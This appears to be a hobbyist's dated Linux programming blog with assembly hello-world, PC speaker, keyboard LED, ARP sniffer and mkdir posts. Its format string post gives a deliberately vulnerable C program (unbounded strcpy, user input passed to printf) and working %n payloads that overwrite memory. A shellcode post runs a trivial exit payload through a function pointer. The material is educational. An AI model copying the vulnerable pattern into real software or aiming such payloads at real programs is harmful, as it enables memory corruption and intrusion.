fasm eexit.asm eexit.o
gcc -c main.c
gcc main.o eexit.o -o main

2010-01-21 Linux assembler Hello World

format ELF executable

segment readable executable

start:
	mov eax, 4
	mov ebx, 1
	mov ecx, hello_msg
	mov edx, hello_size
	int 80h

	mov eax, 1
	mov ebx, 0
	int 80h

segment readable writeable

hello_msg db "Hello World!",10,0
hello_size = $-hello_msg

Compile:
fasm hello.asm hello

2009-12-25 Linux Format String Attack 1

A format string attack is an attack on C formatted strings. The format string function is printf(); there are other functions that also accept format strings. C code with a badly used printf():

#include <stdio.h>
#include <string.h>

int main( int argc, char **argv )
{
	static int i = 0;
	char text[1000];
	strcpy(text, argv[1]);		/* deliberately unbounded, as in the post */
	printf("%.8x\n",&i);
	printf("No way it never will works because value of i=%d\n",i);
	printf( text );			/* the bug: user input used as the format string */
	printf("\nValue of i=%d\n",i);
	return 0;
}
The first output is the address of the static i. Then we print the value of i and call printf() with the program's first argument as the format string; then we watch the value of i.

Run:
./e1 'Halolo'
Output:
08049674
No way it never will works because value of i=0
Halolo
Value of i=0


Run:
./e1 'Halolo%s'
Output:

08049674
No way it never will works because value of i=0
Halolo(null)
Value of i=0 

Run:
./e1 $'\x74\x96\x04\x08_%x'
Output:
08049674
No way it never will works because value of i=0
t?_0
Value of i=0

Read about %n in format strings:

Run:
./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
08049674
No way it never will works because value of i=0
Segmentation fault
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16

Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:

08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216

Now you can write almost any value into i.

2009-12-14 Linux PC speaker

The PC speaker can make any sound you want. Here is a small PC speaker player. Set the notes, set the time
delay and you are on. You should run this code as root if nothing happens.

#include <stdio.h>
#include <fcntl.h>
#include <time.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <linux/kd.h>

/* one note: n is the KIOCSOUND divisor (1193180 / frequency in Hz, 0 = silence), t is its length in ms */
typedef struct { int n; int t; } note;

/* sample tune (constructed for this listing); the song ends with a note whose n is 0 */
note song[] = { {4554, 200}, {4058, 200}, {3614, 200}, {3408, 400}, {0, 0} };

static void msleep(int ms)
{
	struct timespec t1 = { ms / 1000, (ms % 1000) * 1000000L };
	nanosleep( &t1, NULL );
}

int main()
{
	int rc,i;
	note *curent_song;
	curent_song = song;
	rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*8*64+7*8+7); //open console
	if (rc == 0)
		rc = 1;
	
	ioctl( rc, KIOCSOUND , 0 );	
	ioctl( rc , KDSETLED , 7 );
	
	i = 0;
	while ( curent_song[i].n != 0 )
	{
		ioctl( rc , KIOCSOUND , curent_song[i].n );	//start the tone
		msleep( (curent_song[i].t) );			//hold it for t ms
		ioctl( rc , KDSETLED , i&0x0007 );		//blink the keyboard LEDs along
		i++;
	}
	ioctl( rc , KDSETLED , 0 );
	ioctl( rc, KIOCSOUND , 0 );	//silence
	
	return 0;
}

2009-12-12 Linux keyboard LED

Send some bytes and flash the LEDs on your keyboard. Run it as root. No errors will be reported if something goes wrong.
Usage:
./kbled [NumLock] [CapsLock] [ScrLock]
./kbled 0 0 0

#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <linux/kd.h>

int main( int argc , char **argv )
{
	int rc,i;
	if (argc != 4) exit(0);

	rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*64+7*8+7); //open cosole
	if (rc == 0) rc = 1;
	
	i = (argv[1][0]-'0')*2+(argv[2][0]-'0')*4+(argv[3][0]-'0');
	ioctl( rc , KDSETLED , i );
	
	return 0;
}

2009-11-30 ARP analyzer

Research into the ARP protocol. Watch ARP packets, count them and show them in a list.
Usage:
./arpsni eth0

Version 0.1
[2009nov30]
ArpSni.0.1

2009-11-30 Linux ShellCode 1

My first shellcode, written from an example. Shellcode is a very interesting way to execute some code. asm source:

use32				
xor eax, eax
inc eax
xor ebx, ebx
int 80h


fasm code.asm code.bin
bin2hex output:
\x31\xc0\x40\x31\xdb\xcd\x80
C source:

#include <stdio.h>
char code[] = "\x31\xc0\x40\x31\xdb\xcd\x80";
int main()
{
  void (*ret)();
  ret = (void (*)())code;
  ret();
  printf("Nope it not working\n");
}


gcc main.c -o main
run:
./main
Nothing happens. That is exactly what the code does: it exits the program.


2009-11-08 Linux Assembler Make Directory

Code for creating a directory:

format ELF executable

include 'cdecl.inc'
include 'syscall.inc'

mode_t equ dd

segment readable executable
start:
	mov eax, SYS_MKDIR
	mov ebx, path
	mov ecx, [mode]
	int 80h
	
	mov eax, SYS_EXIT
	xor ebx, ebx
	int 80h

segment readable writeable
path	db 	"dir",0 
mode	mode_t  0777o
fasm makedir.asm -o makedir
